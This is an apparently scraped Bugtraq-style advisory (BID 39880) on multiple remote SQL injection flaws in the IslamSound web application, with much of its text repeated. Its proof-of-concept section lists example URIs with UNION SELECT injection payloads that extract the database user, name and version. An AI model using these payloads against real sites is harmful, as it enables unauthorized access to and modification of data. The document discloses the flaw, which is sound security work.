IslamSound Multiple Remote SQL Injection Vulnerabilities
BID:39880
Info
IslamSound Multiple Remote SQL Injection Vulnerabilities
| Bugtraq ID: | 39880 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | May 03 2010 12:00AM |
| Updated: | May 03 2010 12:00AM |
| Credit: | JIKO |
| Vulnerable: |
IslamSound IslamSound 0 |
| Not Vulnerable: | |
Discussion
IslamSound Multiple Remote SQL Injection Vulnerabilities
IslamSound is prone to multiple remote SQL injection vulnerabilities.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
IslamSound is prone to multiple remote SQL injection vulnerabilities.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
IslamSound Multiple Remote SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/sound.php?catid=2 sql
http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8--
http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8--
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/sound.php?catid=2 sql
http://www.example.com/details.php?linkid=-7 union select user(),1,2,database(),version(),5,6,7,8--
http://www.example.com/send.php?linkid=-5 union select user(),1,2,3,4,5,6,7,8--
Solution / Fix
IslamSound Multiple Remote SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
IslamSound Multiple Remote SQL Injection Vulnerabilities
References:
References:
- IslamSound Homepage (IslamSound)